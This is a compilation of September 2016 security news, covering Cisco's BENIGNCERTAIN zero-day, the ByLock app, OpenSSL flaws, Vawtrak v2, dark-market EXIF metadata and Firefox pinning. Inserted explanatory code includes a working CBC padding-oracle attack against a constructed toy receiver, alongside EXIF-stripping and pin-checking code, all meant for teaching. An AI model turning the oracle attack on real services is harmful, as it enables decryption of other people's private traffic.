Cisco finds new Zero-Day Exploit linked to NSA Hackers
20.9.2016 THEHACKERNEWS Vulnerability
Network equipment vendor Cisco is warning its customers of another zero-day vulnerability the company discovered in the trove of NSA hacking exploits and implants leaked by the group calling itself "The Shadow Brokers."
Last month, the Shadow Brokers published firewall exploits, implants, and hacking tools allegedly stolen from the NSA-linked Equation Group, designed to target products from major vendors including Cisco, Juniper, and Fortinet.
One of those exploits, dubbed ExtraBacon, leveraged a zero-day vulnerability (CVE-2016-6366) in the Simple Network Management Protocol (SNMP) code of Cisco ASA software that could allow an attacker who knows the SNMP community string to cause a reload of the affected system or execute arbitrary code.
Now Cisco has found that another exploit in the dump, dubbed "BenignCertain," which targets PIX firewalls, also reaches its current products.
Cisco's first analysis of the exploit concluded that it did not involve any new flaw in current products.
Further analysis of BenignCertain, however, revealed that the exploit also affects Cisco products running IOS, IOS XE and IOS XR software.
BenignCertain leverages a vulnerability (CVE-2016-6415) in the IKEv1 packet-processing code that affects several Cisco devices running IOS software and all Cisco PIX firewalls.
IKE (Internet Key Exchange) is the protocol that negotiates the keys and security associations for IPsec; firewalls and routers use it to build virtual private networks (VPNs), including links into industrial control systems.
A remote, unauthenticated attacker could use this vulnerability to retrieve memory contents from the device and so obtain sensitive information such as RSA private keys and configuration data, simply by sending specially crafted IKEv1 packets to an affected device.
"The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests," Cisco said in its advisory.
Cisco IOS XR versions 4.3.x, 5.0.x, 5.1.x and 5.2.x, as well as PIX firewall versions 6.x and earlier, are vulnerable, though Cisco has not supported the PIX line since 2009.
Cisco has not yet released a patch for the flaw, and no workarounds are available.
The company said the vulnerability is being exploited in the wild and advised customers to deploy intrusion detection (IDS) and intrusion prevention (IPS) systems to help block the attacks.
Cisco promised to release software updates to patch CVE-2016-6415 but did not specify a time frame.

How an insecure messaging app led to the fall of a terrorist organization in Turkey
20.9.2016 securityaffairs Cyber

MIT (the Turkish National Intelligence Organization) hacked a single server of a messaging app hosted in Lithuania in order to identify members of an Islamist group that Turkey designates as a terrorist organization.
Amid the political turmoil that followed the coup attempt of July 15 [1], it appears that a cyber confrontation between MIT [2] (the Turkish National Intelligence Organization) and FETO [3] ended up handing the names of the organization's key members to the government authorities.

It all started with the release of a mobile messaging app called ByLock, which looked like an ordinary messaging product with offline mail and online voice-call features, supposedly developed by a David Keynes from Oregon. It later emerged that no such person exists and that the app was built by the organization to move its day-to-day communication underground.

Despite the "next generation of secure communication" slogan on the ByLock homepage (still live at https://bylockapp.wordpress.com/), the app drew MIT's attention months after its release because of its popularity among FETO members. It was easily decompiled, and the decompiled code pointed to a server in Lithuania on which all messages, passwords and IP addresses were stored in plaintext.

After the server in Lithuania was hacked, analysts downloaded nearly 3.5 million messages that revealed some 53,000 people linked to the organization. The breach gave the Turkish authorities a considerable advantage from mid-2015 onward, and again after the failed coup attempt.

But this is not the end of the story. Recently the Minister of Science, Industry and Technology, Faruk Ozlu, revealed suspicions that ByLock was the product of covert FETO members working at TUBITAK [4] (the Scientific and Technological Research Council of Turkey). "Our investigations at TUBITAK are still ongoing and we are sorting suspected people into five categories. We have dismissed those found in categories 4 and 5; those in the other three categories are being examined for evidence," Ozlu told the Anadolu Agency (AA) on September 9.

The TUBITAK revelations also point to another struggle: the wiretaps leaked in 2013 containing Tayyip Erdogan's conversations [5] on crypto-phones developed by TUBITAK, which the authorities later denied and called 'fake'.


[1] https://en.wikipedia.org/wiki/2016_Turkish_coup_d%27%C3%A9tat_attempt
[2] http://mit.gov.tr
[3] https://en.wikipedia.org/wiki/G%C3%BClen_movement
[4] http://tubitak.gov.tr/en
[5] http://www.ibtimes.com/are-erdogan-corruption-tapes-real-1558185

OpenSSL will patch a high-severity vulnerability this week
20.9.2016 securityaffairs Vulnerability

The OpenSSL Project announced early this week that it will release updates that patch multiple vulnerabilities.
One of the flaws affecting the popular toolkit carries a "high" severity rating.

The Project plans to release OpenSSL versions 1.1.0a, 1.0.2i and 1.0.1u on Thursday, September 22. It confirmed that the updates will fix one flaw of high severity and one of moderate severity; the remaining issues are all of low severity.

The time taken to fix a flaw depends on its severity: high-severity issues are normally fixed in a release within a month, while critical issues are fixed as soon as possible to limit exploitation in the wild.

The OpenSSL Project has once again reminded users that support for version 1.0.1 will end on December 31. The 1.1.0 branch was released on August 25.

The OpenSSL Project has already issued three security patches this year that addressed a total of 16 vulnerabilities.

In May, the OpenSSL Project fixed CVE-2016-2107, a padding-oracle flaw in the cryptographic library that a man-in-the-middle attacker could exploit to decrypt HTTPS traffic when the connection uses an AES-CBC cipher suite and the server supports AES-NI.

According to the experts, the flaw had been present since 2013, when the project's maintainers fixed another padding-oracle flaw known as Lucky 13.

“A MITM attacker can use a padding oracle attack to decrypt traffic when the connection uses an AES CBC cipher and the server support AES-NI.” states the advisory issued by the OpenSSL. “This issue was introduced as part of the fix for Lucky 13 padding attack (CVE-2013-0169). The padding check was rewritten to be in constant time by making sure that always the same bytes are read and compared against either the MAC or padding bytes. But it no longer checked that there was enough data to have both the MAC and padding bytes.”
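The class of bug the advisory describes, as an added example that is not OpenSSL's code: a TLS-1.0-style MAC-then-pad-then-encrypt record is checked by two variants of a receiver, one that reports padding failures and MAC failures as different alerts (the oracle) and one that checks the record length first and answers BAD_RECORD_MAC for every failure. An attacker holding only those verdicts recovers the whole plaintext from the first variant and nothing from the second. The block cipher is a toy stand-in for AES so the code runs offline, the message, keys and 8-byte truncated tag are constructed for the demo, and nothing here reproduces the actual OpenSSL code path.

```python
"""CBC padding-oracle demo: leaky vs. uniform-error record checks (constructed example)."""
import hashlib
import hmac
import secrets

BLOCK = 16    # cipher block size
MAC_LEN = 8   # truncated HMAC tag, kept short for the demo (assumption, not a TLS value)


def _enc_block(key: bytes, block: bytes) -> bytes:
    """Toy 16-byte 'block cipher' (NOT AES, NOT secure): XOR with key, rotate left by key[0] % 16."""
    x = bytes(a ^ b for a, b in zip(block, key))
    r = key[0] % BLOCK
    return x[r:] + x[:r]


def _dec_block(key: bytes, block: bytes) -> bytes:
    r = key[0] % BLOCK
    x = block[BLOCK - r:] + block[:BLOCK - r]
    return bytes(a ^ b for a, b in zip(x, key))


def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = _enc_block(key, bytes(a ^ b for a, b in zip(data[i:i + BLOCK], prev)))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        c = data[i:i + BLOCK]
        out.append(bytes(a ^ b for a, b in zip(_dec_block(key, c), prev)))
        prev = c
    return b"".join(out)


def seal(enc_key: bytes, mac_key: bytes, msg: bytes) -> bytes:
    """MAC-then-pad-then-encrypt, TLS 1.0 style: msg || tag || (pad_len+1 bytes of pad_len)."""
    tag = hmac.new(mac_key, msg, hashlib.sha256).digest()[:MAC_LEN]
    body = msg + tag
    pad = (BLOCK - (len(body) + 1) % BLOCK) % BLOCK
    body += bytes([pad]) * (pad + 1)
    iv = secrets.token_bytes(BLOCK)
    return iv + cbc_encrypt(enc_key, iv, body)


def open_record(enc_key: bytes, mac_key: bytes, record: bytes, leaky: bool):
    """Return (alert, msg). leaky=True distinguishes padding from MAC failures: the oracle.
    leaky=False answers BAD_RECORD_MAC for every failure, as a hardened stack should."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    pt = cbc_decrypt(enc_key, iv, ct)
    pad = pt[-1]
    # Require room for the padding AND a full MAC before reading either (the length check
    # the advisory says the Lucky 13 rewrite lost), then verify the padding bytes.
    pad_ok = pad + 1 + MAC_LEN <= len(pt) and pt[-(pad + 1):] == bytes([pad]) * (pad + 1)
    mac_ok, msg = False, None
    if pad_ok:
        body = pt[:-(pad + 1)]
        msg, tag = body[:-MAC_LEN], body[-MAC_LEN:]
        expect = hmac.new(mac_key, msg, hashlib.sha256).digest()[:MAC_LEN]
        mac_ok = hmac.compare_digest(tag, expect)
    if pad_ok and mac_ok:
        return None, msg
    if leaky:
        return ("DECRYPTION_FAILED" if not pad_ok else "BAD_RECORD_MAC"), None
    return "BAD_RECORD_MAC", None


def padding_oracle_attack(oracle, record: bytes) -> bytes:
    """Recover every plaintext block after the IV using only the oracle's alert names."""
    blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
    filler = bytes(BLOCK) * 2   # prepended so the forged record is long enough for MAC + padding
    recovered = b""
    for n in range(1, len(blocks)):
        prev, target = blocks[n - 1], blocks[n]
        known = bytearray(BLOCK)
        for i in range(BLOCK - 1, -1, -1):
            t = BLOCK - 1 - i       # padding value that bytes i..15 must decrypt to
            for g in range(256):
                forged = bytearray(prev)
                for j in range(i + 1, BLOCK):
                    forged[j] = prev[j] ^ known[j] ^ t
                forged[i] = prev[i] ^ g ^ t
                if oracle(filler + bytes(forged) + target) == "DECRYPTION_FAILED":
                    continue
                if i == BLOCK - 1:  # rule out a longer genuine pad run passing as pad 0
                    probe = bytearray(forged)
                    probe[i - 1] ^= 0x55
                    if oracle(filler + bytes(probe) + target) == "DECRYPTION_FAILED":
                        continue
                known[i] = g
                break
        recovered += bytes(known)
    return recovered


def demo(msg: bytes = b"attack at dawn; wire 50k to acct 7731"):
    """Constructed message and keys; returns (recovered via leaky, via hardened, ground truth)."""
    enc_key, mac_key = secrets.token_bytes(BLOCK), secrets.token_bytes(32)
    rec = seal(enc_key, mac_key, msg)
    truth = cbc_decrypt(enc_key, rec[:BLOCK], rec[BLOCK:])   # msg || tag || padding

    def leaky(r):
        return open_record(enc_key, mac_key, r, leaky=True)[0]

    def hardened(r):
        return open_record(enc_key, mac_key, r, leaky=False)[0]

    return padding_oracle_attack(leaky, rec), padding_oracle_attack(hardened, rec), truth
```

Against the hardened receiver every forged record gets the same answer, so the attacker's first guess is accepted at every position and the "recovered" bytes are noise; the uniform alert, not the constant-time padding loop, is what closes the oracle. Timing side channels (the Lucky 13 angle) are a separate concern that this byte-level demo does not model.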

According to the security firm High-Tech Bridge, on May 31 many of the Alexa Top 10,000 websites were still vulnerable to CVE-2016-2107, even though the OpenSSL Project had issued the fix on May 3.

Earlier this year the OpenSSL Project released versions 1.0.2f and 1.0.1r to fix two vulnerabilities. The more severe one, CVE-2016-0701 (rated high), affected the Diffie-Hellman key exchange implementation present only in OpenSSL 1.0.2 and could allow an attacker to recover a server's private DH exponent when the server reused it across connections, exposing the session keys derived from it.

Another round of security updates released in March fixed several vulnerabilities, including the DROWN flaw, which an attacker could exploit to decrypt TLS sessions and access users' sensitive data by abusing servers that still supported SSLv2, or that shared their RSA key with one that did. At the time of disclosure, security experts estimated that DROWN affected a quarter of the top one million HTTPS domains and one-third of all HTTPS servers.

Vawtrak v2, a close look at the cybercriminal groups behind the threat
19.9.2016 securityaffairs Crime

Security experts from the cyber threat intelligence firm Blueliv have published a report on the Vawtrak v2 banking Trojan and its criminal ecosystem.
Blueliv's researchers conducted a technical investigation of Vawtrak v2 and of the activities of the cybercriminal groups behind the threat.

Vawtrak has been in the wild since 2014, when experts at Trend Micro spotted it targeting Japanese Internet users. The first variant, BKDR_VAWTRAK, abused a Windows feature called Software Restriction Policies (SRP) to prevent victims' systems from running a wide range of security programs.

Several versions of the malware have appeared over the years; the latest variant was discovered this summer by experts at Fidelis and included significant improvements such as SSL pinning for its command-and-control traffic.

Researchers from Blueliv have now reverse engineered the Vawtrak banking Trojan and confirmed the presence of two clearly separated infrastructures: one dedicated exclusively to malware distribution (primarily spam), and a second used for maintenance, control and the reporting of stolen data.

The analysis of the Vawtrak v2 revealed a complex infrastructure used to deliver the malware as well as other Trojans. Blueliv named the cybercriminal group behind this infrastructure Moskalvzapoe.

Moskalvzapoe uses several servers hosting command and control (C2) for Vawtrak and other Trojans (e.g. the Pony credential stealer). The threat is spread primarily through spam and drive-by downloads that rely on exploit kits (mostly the Nuclear EK).

The Moskalvzapoe infrastructure has an unusual network topology in terms of how the crooks have set up their C&C servers and how they rotate domains and exposed IPs.

“All these hosts forward all the incoming connections towards the back-end.” reads the analysis from BlueLiv. “The Trojans dropped by the loaders are usually found in compromised servers which share multiple characteristics including geolocation. Most of the compromised hosts can be found in Russia. Usually these hosts are compromised using security vulnerabilities found in commonly used software such as WordPress, Joomla, or Bitrix. Furthermore, the deployment of Pony Grabber, the credential-stealing malware, enables them access to other hosts and services.”

Vawtrak v2 can perform further actions by loading additional modules, which significantly expand its capabilities. The modules most commonly used by the banking Trojan:

Steal credentials from various applications installed in the host.
Provide the attackers with remote access.
Use the host as a proxy.
Steal certificates.
Log the user's keystrokes.
Webinject module.
The largest number of Vawtrak v2 infections was observed in the US (69,010), followed by Canada (6,777) and the UK (969); the impact in continental Europe was minimal.

“The total amount of data exfiltrated by the botnet is more than 2,500,000 credentials. The fact that U.S. is the most affected country is also reflected in the most affected services.” reads the report published by BlueLiv.

The analysis published by Blueliv revealed the use of large-scale communication networks that significantly raise the sophistication of the criminal infrastructure supporting the worldwide distribution of Vawtrak v2.

The data in the report shows the capabilities of cybercrime groups that operate with complex hierarchies and an efficient business model.

I recommend reading the report, titled "Chasing cybercrime: Network insights into Vawtrak v2", which is full of interesting data on the malware and the threat actors behind it.

Blueliv also provided Indicators of Compromise (IOCs) that could be used by organizations to detect the threat.

Boffins analyzed EXIF metadata in photos on the principal black markets
19.9.2016 securityaffairs Crime

Two researchers have analyzed the EXIF metadata in photos used by crooks to advertise their products on black marketplaces in the dark web.
Darknets are a favored environment for crooks who want to run a lucrative business while protecting their anonymity; even so, there are several details they need to take care of in order not to leave tracks that could allow their identification.

In the past, the analysis of EXIF metadata has allowed law enforcement and intelligence agencies to track suspects, and now cyber criminals, including sellers on the principal black markets, have started to strip the metadata from the photos they post. The trend was confirmed by a study conducted by two Harvard University students, Paul Lisker and Michael Rose.

“Our goal was to leverage a longitudinal archive of dark net markets (DNMs) to collect and analyze sale listing images with metadata containing location data.” the students explained in a post.

What is EXIF metadata?

“Exchangeable image file format (officially Exif, according to JEIDA/JEITA/CIPA specifications) is a standard that specifies the formats for images, sound, and ancillary tags used by digital cameras (including smartphones), scanners and other systems handling image and sound files recorded by digital cameras.” reads Wikipedia.

Basically, every image taken with a digital camera or a mobile device embeds information such as the device used and the location of the shot, written in the "exchangeable image file format" (EXIF) standard.

Paul Lisker and Michael Rose analyzed images of drugs and weapons used by crooks to advertise their products and services on dark web marketplaces, drawing on a data repository maintained by the independent researcher Gwern Branwen.

The archive is very interesting for security experts who want to study activity in the dark web: it includes data from some 83 dark markets and 40 associated forums, collected from 2013 to 2015 and totalling 44 million files or 1.5 TB of data.

“From 2013-2015, I scraped/mirrored on a weekly or daily basis all existing English-language DNMs as part of my research into their usage, lifetimes/characteristics, & legal riskiness; these scrapes covered vendor pages, feedback, images, etc. In addition, I made or obtained copies of as many other datasets & documents related to the DNMs as I could. This uniquely comprehensive collection is now publicly released as a 50GB (~1.6TB uncompressed) collection covering 89 DNMs & 37+ related forums, representing <4,438 mirrors, and is available for any research. This page documents the download, contents, interpretation, and technical methods behind the scrapes.” wrote Branwen.

The students used bash and Python scripts to search the archive's images for EXIF data containing longitude and latitude.

“In order to analyze the listing images inside each archive, we first searched for and compiled a list of the file path of all JPEG images to ensure that no file went untested. (Images used for listings were only in the JPEG format; any other image formats — PNG, GIF, etc. — were used for website graphics.) Then, using Python and bash scripts, we checked each image’s EXIF data for longitude or latitude data, saving the coordinates for each geotagged photo and its file path to a text file.” explained the students.
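What that scan does at the byte level, as an added example (the students' scripts are not reproduced on the page, and this is not their code): a stdlib-only reader that walks the JPEG marker segments, finds the APP1/Exif payload, follows the IFD0 pointer to the GPS sub-IFD and converts the degree/minute/second rationals to signed decimal degrees, together with the strip routine a careful seller or market would run before upload. The geotagged JPEG is constructed inline (an Exif header with no picture data) and the coordinates in it are invented.

```python
"""Minimal Exif GPS reader and stripper for JPEG files (constructed example, stdlib only)."""
import struct

GPS_IFD_TAG = 0x8825                                      # IFD0 entry pointing at the GPS sub-IFD
TAG_LAT_REF, TAG_LAT, TAG_LON_REF, TAG_LON = 1, 2, 3, 4   # GPS sub-IFD tags
TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1}         # bytes per element for TIFF types


def _read_ifd(tiff: bytes, off: int, bo: str) -> dict:
    """Parse one IFD into {tag: (type, count, 4-byte value/offset field)}."""
    (n,) = struct.unpack(bo + "H", tiff[off:off + 2])
    entries = {}
    for i in range(n):
        e = off + 2 + 12 * i
        tag, typ, cnt = struct.unpack(bo + "HHI", tiff[e:e + 8])
        entries[tag] = (typ, cnt, tiff[e + 8:e + 12])
    return entries


def _value(tiff: bytes, entry, bo: str):
    """Resolve an IFD entry: inline if it fits in 4 bytes, otherwise follow the offset."""
    typ, cnt, raw = entry
    size = TYPE_SIZE[typ] * cnt
    data = raw[:size] if size <= 4 else tiff[struct.unpack(bo + "I", raw)[0]:][:size]
    if typ == 2:                                          # ASCII
        return data.rstrip(b"\0").decode("ascii")
    if typ == 5:                                          # RATIONAL: (numerator, denominator) pairs
        nums = struct.unpack(bo + "I" * (2 * cnt), data)
        return [nums[i] / nums[i + 1] for i in range(0, 2 * cnt, 2)]
    if typ == 4:                                          # LONG
        return struct.unpack(bo + "I" * cnt, data)
    return data


def _segments(jpeg: bytes):
    """Yield (marker, start, end) for each marker segment between SOI and SOS."""
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker == 0xDA:                                # start of scan: image data follows
            break
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        yield marker, pos, pos + 2 + length
        pos += 2 + length


def _is_exif(jpeg: bytes, marker: int, start: int) -> bool:
    return marker == 0xE1 and jpeg[start + 4:start + 10] == b"Exif\0\0"


def gps_coordinates(jpeg: bytes):
    """Return (lat, lon) in signed decimal degrees from the GPS sub-IFD, or None if absent."""
    for marker, s, e in _segments(jpeg):
        if not _is_exif(jpeg, marker, s):
            continue
        tiff = jpeg[s + 10:e]
        bo = "<" if tiff[:2] == b"II" else ">"          # "II" little endian, "MM" big endian
        ifd0 = _read_ifd(tiff, struct.unpack(bo + "I", tiff[4:8])[0], bo)
        if GPS_IFD_TAG not in ifd0:
            return None
        gps = _read_ifd(tiff, _value(tiff, ifd0[GPS_IFD_TAG], bo)[0], bo)
        if not all(t in gps for t in (TAG_LAT_REF, TAG_LAT, TAG_LON_REF, TAG_LON)):
            return None

        def dms(tag, ref_tag, negative_ref):
            d, m, sec = _value(tiff, gps[tag], bo)
            val = d + m / 60 + sec / 3600
            return -val if _value(tiff, gps[ref_tag], bo) == negative_ref else val

        return dms(TAG_LAT, TAG_LAT_REF, "S"), dms(TAG_LON, TAG_LON_REF, "W")
    return None


def strip_exif(jpeg: bytes) -> bytes:
    """Copy the JPEG without its APP1/Exif segments; the image data is left untouched."""
    out, pos = bytearray(jpeg[:2]), 2
    for marker, s, e in _segments(jpeg):
        if not _is_exif(jpeg, marker, s):
            out += jpeg[s:e]
        pos = e
    return bytes(out + jpeg[pos:])


def build_geotagged_jpeg(lat_dms, lat_ref, lon_dms, lon_ref) -> bytes:
    """Construct a minimal little-endian Exif-only JPEG for testing (no real picture inside)."""
    rat = lambda v: struct.pack("<II", int(v), 1)
    ifd = lambda ents: struct.pack("<H", len(ents)) + b"".join(ents) + b"\0\0\0\0"
    # Layout: TIFF header(8) IFD0(18) GPS IFD(54) lat rationals(24) lon rationals(24)
    ifd0 = ifd([struct.pack("<HHII", GPS_IFD_TAG, 4, 1, 26)])
    gps = ifd([struct.pack("<HHI", TAG_LAT_REF, 2, 2) + lat_ref.encode() + b"\0\0\0",
               struct.pack("<HHII", TAG_LAT, 5, 3, 80),
               struct.pack("<HHI", TAG_LON_REF, 2, 2) + lon_ref.encode() + b"\0\0\0",
               struct.pack("<HHII", TAG_LON, 5, 3, 104)])
    tiff = (b"II*\0" + struct.pack("<I", 8) + ifd0 + gps
            + b"".join(map(rat, lat_dms)) + b"".join(map(rat, lon_dms)))
    app1 = b"Exif\0\0" + tiff
    return b"\xFF\xD8\xFF\xE1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xFF\xDA\0\0\xFF\xD9"
```

Walking a directory of listing images with `gps_coordinates` is the whole scan; note that stripping has to remove the entire APP1 segment (or rewrite it without the GPS sub-IFD), since zeroing the coordinate values alone still advertises that the seller's camera geotags and that the tags were edited.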

They found 229 unique images that contained geolocation data precise enough to place the shot within roughly a mile of its true location.

The duo analysed roughly 223,471 unique dark-market images, the vast majority of which contained no EXIF location data.

“Out of these markets and forums, we located 2,276 total geotagged images, which after eliminating duplicates available over multiple days, gave 229 total unique images with associated coordinates. The coordinates—with decimals removed from the numbers to protect privacy—can be seen plotted in the map below. (The coordinates may be up to about one mile away from their true location.)” states the duo.

“In total, we analyzed 7,522,284 images from the entire DNM archive, representing 223,471* unique photos. Table 1 presents a summary of markets containing geotagged images:”


The most popular black markets, such as Agora, stripped metadata from the images published in their listings. In the case of Agora, the researchers noticed that EXIF metadata was absent from all images after 18 March 2014.


In the conclusions of the study, the researchers highlighted that some sellers and dark market websites are still failing to remove EXIF metadata from images.

“First, it was common in many cases to observe sites, typically residential, surrounded by 5–10 tagged images separated by a few meters,” the students explained in a post.

“This suggests the behavior of sellers who are careless on a regular basis, rather than the occasional forgetfulness of not stripping data or purposeful manipulation.

“We also found several instances of these clusters incorporating listings on multiple sites, pointing to sellers with activities across the darknet and failing to strip their products’ location on any of the sites up.”

Firefox Browser vulnerable to Man-in-the-Middle Attack
19.9.2016 thehackernews Vulnerability
A critical vulnerability in the fully patched version of Mozilla's Firefox browser could allow well-resourced attackers to mount man-in-the-middle (MITM) impersonation attacks; the flaw also affects the Tor Browser.
The Tor Project patched the issue in the browser's HTTPS certificate-pinning code on Friday with the release of Tor Browser 6.0.5, while Mozilla has yet to fix the flaw in Firefox.
Attackers can deliver Fake Tor and Firefox Add-on Updates
The vulnerability could allow a man-in-the-middle attacker who is able to obtain a forged certificate for addons.mozilla.org to impersonate Mozilla's servers and deliver a malicious update for NoScript, HTTPS Everywhere or any other Firefox extension installed on a targeted computer.
"This could lead to arbitrary code execution [vulnerability]," Tor officials warned in an advisory. "Moreover, other built-in certificate pinnings are affected as well."
Although obtaining a fraudulent certificate for addons.mozilla.org from one of the several hundred certificate authorities (CAs) trusted by Firefox would be challenging, it is within reach of well-resourced nation-state attackers.
The vulnerability was initially reported on Tuesday by a security researcher who goes by the name @movrcx, who described the attack against Tor and estimated that attackers would need around US$100,000 to launch the multi-platform attack.
Actual Issue resides in Firefox's Certificate Pinning Procedure
However, according to a report posted on Thursday by the independent security researcher Ryan Duff, the issue also affects stable versions of Firefox, although a nightly build released on September 4 is not susceptible.
Duff said the actual problem lies in Firefox's own method for handling certificate pinning for Mozilla's domains, which is separate from the IETF-standard HPKP (HTTP Public Key Pinning) mechanism.
Certificate pinning is an HTTPS hardening feature that makes the browser accept only specific public keys (or the certificates carrying them) for a particular domain or subdomain and reject all others, so that a certificate issued by any other CA, even a trusted one, cannot be used to spoof the site.
While not very widely deployed, the HPKP standard is often used by websites that handle sensitive information.
"Firefox uses its own static key pinning method for its own Mozilla certifications instead of using HPKP," says Duff. "The enforcement of the static method appears to be much weaker than the HPKP method and is flawed to the point that it is bypassable in this attack scenario."
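How a pin check of the HPKP kind decides whether a chain is acceptable, as an added example that is not Firefox's code or Mozilla's pin list: pins are learned from a Public-Key-Pins header only when one pin matches a key in the served chain and a backup pin does not, a later chain is rejected if none of its keys is pinned, and an expired pin set is simply not enforced, so the protection lasts only as long as the pin set is valid. The host name, the key bytes (stand-ins for DER SubjectPublicKeyInfo structures) and the timestamps are constructed.

```python
"""HPKP-style public-key pinning as a client would enforce it (constructed example)."""
import base64
import hashlib
import re

PIN_RE = re.compile(r'pin-sha256="([A-Za-z0-9+/=]+)"')
MAX_AGE_RE = re.compile(r"max-age=(\d+)")


def spki_pin(spki_der: bytes) -> str:
    """RFC 7469 pin value: base64(SHA-256(SubjectPublicKeyInfo DER))."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode()


def learn_pins(store: dict, host: str, header: str, chain_spki: list, now: float) -> bool:
    """Process a Public-Key-Pins header received over a validated connection.
    RFC 7469 acceptance rules: a max-age, at least one pin matching a key in the
    served chain, and at least one backup pin that does NOT match the chain."""
    pins = set(PIN_RE.findall(header))
    m = MAX_AGE_RE.search(header)
    chain_pins = {spki_pin(k) for k in chain_spki}
    if not m or not (pins & chain_pins) or not (pins - chain_pins):
        return False
    if int(m.group(1)) == 0:                 # max-age=0 clears any stored pin set
        store.pop(host, None)
        return True
    store[host] = {"pins": pins, "expires": now + int(m.group(1)),
                   "subdomains": "includesubdomains" in header.lower()}
    return True


def chain_allowed(store: dict, host: str, chain_spki: list, now: float) -> bool:
    """Pin check for a new connection: False means the chain must be rejected even if a
    trusted CA signed it. With no stored pin set, or an expired one, pinning is not
    enforced and the decision falls back to ordinary CA validation (fail-open)."""
    for pinned_host, ps in store.items():
        if host != pinned_host and not (ps["subdomains"] and host.endswith("." + pinned_host)):
            continue
        if now >= ps["expires"]:
            continue
        return any(spki_pin(k) in ps["pins"] for k in chain_spki)
    return True


def demo():
    """Stand-in keys (arbitrary bytes, not real DER) and an invented host; three verdicts."""
    leaf, intermediate, backup = b"leaf-spki-der", b"intermediate-spki-der", b"backup-spki-der"
    rogue_leaf, rogue_ca = b"rogue-leaf-spki-der", b"rogue-ca-spki-der"   # forged by another CA
    header = ('pin-sha256="%s"; pin-sha256="%s"; max-age=5184000; includeSubDomains'
              % (spki_pin(intermediate), spki_pin(backup)))
    store, t0 = {}, 1_474_000_000.0
    assert learn_pins(store, "addons.example", header, [leaf, intermediate], t0)
    genuine = chain_allowed(store, "addons.example", [leaf, intermediate], t0 + 60)
    forged = chain_allowed(store, "addons.example", [rogue_leaf, rogue_ca], t0 + 60)
    forged_after_expiry = chain_allowed(store, "addons.example", [rogue_leaf, rogue_ca],
                                        t0 + 5184000 + 1)
    return genuine, forged, forged_after_expiry
```

The third verdict is the property worth remembering about any pinning scheme, built-in or header-driven: once the pin set lapses, a certificate from any trusted CA is accepted again, which is why pins shipped inside a browser have to be refreshed with the browser.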
Mozilla is scheduled to release Firefox 49 on September 20, so the team has enough time to ship a fix in that release. The Tor Project took just one day to address the flaw after the bug's disclosure went public.
Users of the Tor Browser should update to version 6.0.5, while Firefox users should disable automatic add-on updates, which are enabled by default, or consider using a different browser until Mozilla releases a fix.

CVE-2016-6415 – CISCO confirms a new Zero-Day linked to Equation Group hack
19.9.2016 securityaffairs Vulnerability
Cisco has revealed the existence of another zero-day vulnerability, tracked as CVE-2016-6415, exploited by a tool in the Equation Group archive leaked by the Shadow Brokers.
This summer a group of hackers known as the Shadow Brokers claimed to have hacked into the arsenal of the NSA-linked Equation Group and leaked roughly 300 MB of exploits, implants, and hacking tools.

The existence of the Equation Group was revealed in February 2015 by security researchers at Kaspersky Lab. The alleged nation-state actor has been operating since 2001 and has targeted practically every industry with sophisticated zero-day exploits.

Kaspersky Lab's report described the Equation Group as combining sophisticated and complex tactics, techniques, and procedures, and speculated that it had interacted with the operators behind Stuxnet and Flame. Based on the evidence collected across its cyber-espionage campaigns over the years, the experts hypothesized that the National Security Agency (NSA) could be linked to the group.

After the Shadow Brokers leaked the archive online, major vendors such as Cisco, Juniper, and Fortinet analyzed their products to find and fix the vulnerabilities targeted by the Equation Group's exploits.

Cisco, for example, found in the arsenal a tool dubbed EXTRABACON that could compromise Cisco ASA appliances.

EXTRABACON exploits CVE-2016-6366, allowing an attacker who has already gained a foothold in the targeted network, and knows the device's SNMP community string, to take full control of a Cisco ASA firewall. The flaw resides in the Simple Network Management Protocol (SNMP) implementation of the ASA software.

“A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the advisory published by CISCO.

At the end of August Cisco started releasing patches for its ASA software to address the EXTRABACON exploit included in the leaked NSA data dump.

Analysis of the leaked material also revealed an exploit dubbed BENIGNCERTAIN, which extracts VPN secrets, including private keys, from certain Cisco devices.

The researcher Mustafa Al-Bassam, who analyzed the data dump, called the attack "PixPocket" after the product the tool targets, the Cisco PIX.

The Cisco PIX product family was declared end-of-life back in 2009, but it is still widely deployed by government entities and enterprises.

According to Al-Bassam, the tool works against Cisco PIX versions 5.2(9) up to 6.3(4). Cisco said the exploit does not affect PIX versions 7.0 and later, and on August 19 it stated that it had not identified any new flaws linked to the BENIGNCERTAIN exploit.

Unfortunately, further analysis revealed that the flaw exploited by BENIGNCERTAIN, tracked as CVE-2016-6415, also affects products running IOS, IOS XE and IOS XR software.

CVE-2016-6415 resides in the IKEv1 packet-processing code. A remote, unauthenticated attacker could exploit it to retrieve memory contents from the device.

“The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests,” reads the security advisory published by Cisco.

The flaw affects Cisco IOS XR versions 4.3.x, 5.0.x, 5.1.x and 5.2.x; versions 5.3.0 and later are not affected. All IOS XE releases and various versions of IOS are affected.

Cisco confirmed that all the firewalls in the PIX family and all products running affected versions of IOS, IOS XE and IOS XR are vulnerable if they are configured to use IKEv1.

The bad news is that Cisco is aware of attacks against some customers that attempt to exploit the vulnerability.

While security patches for CVE-2016-6415 are pending, Cisco has published indicators of compromise (IoCs) and urges its customers to protect vulnerable products with IPS and IDS solutions.

